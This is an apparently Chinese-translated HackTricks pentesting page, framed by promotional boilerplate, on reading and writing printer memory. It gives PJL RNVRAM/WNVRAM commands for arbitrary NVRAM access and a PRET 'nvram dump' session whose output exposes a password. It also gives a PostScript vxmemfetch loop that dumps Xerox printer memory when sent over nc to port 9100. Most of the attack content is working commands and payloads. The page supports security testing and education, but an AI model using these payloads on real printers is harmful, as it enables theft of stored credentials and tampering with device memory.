hacktricks/network-services-pentesting/pentesting-printers/memory-access.md

零基础学习 AWS 黑客技术成为英雄 htARTE (HackTricks AWS 红队专家)！

支持 HackTricks 的其他方式：

• 如果您想在 HackTricks 中看到您的公司广告 或 下载 HackTricks 的 PDF，请查看订阅计划！
• 获取 官方 PEASS & HackTricks 商品
• 发现 PEASS 家族，我们独家的 NFTs 集合
• 加入 💬 Discord 群组 或 telegram 群组 或在 Twitter 🐦 @carlospolopm上关注我。
• 通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 来分享您的黑客技巧。

您可以尝试转储 NVRAM 并从中提取机密信息（如密码）。

在 PJL (Brother) 中，您可以使用 PJL 访问任意 NVRAM 地址，如下所示：

@PJL RNVRAM ADDRESS = X              # read byte at location X
@PJL WNVRAM ADDRESS = X DATA = Y     # write byte Y to location X

您可以使用 PRET 来测试这种攻击：

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> nvram dump
Writing copy to nvram/printer
................................................................................
................................................................................
............................................MyS3cretPassw0rd....................
................................................................................

某些Xerox打印机型号内置了专有的PostScript vxmemfetch操作符，允许攻击者读取任意内存地址。通过使用PostScript循环，如下所示，可以轻松地用这个功能来转储整个内存（PRET没有这个攻击，所以你需要将这个有效载荷通过nc连接发送到9100端口）：

/counter 0 def 50000 {
/counter counter 1 add def
currentdict /RRCustomProcs /ProcSet findresource begin
begin counter 1 false vxmemfetch end end == counter
} repeat

更多信息请访问： http://hacking-printers.net/wiki/index.php/Memory_access

通过 htARTE (HackTricks AWS Red Team Expert)从零开始学习AWS黑客攻击！

支持HackTricks的其他方式：

• 如果您希望在HackTricks中看到您的公司广告或下载HackTricks的PDF，请查看订阅计划！
• 获取官方的PEASS & HackTricks商品
• 发现PEASS家族，我们独家的NFTs系列
• 加入 💬 Discord群组 或 telegram群组 或在 Twitter 🐦 上关注我 @carlospolopm。
• 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享您的黑客技巧。**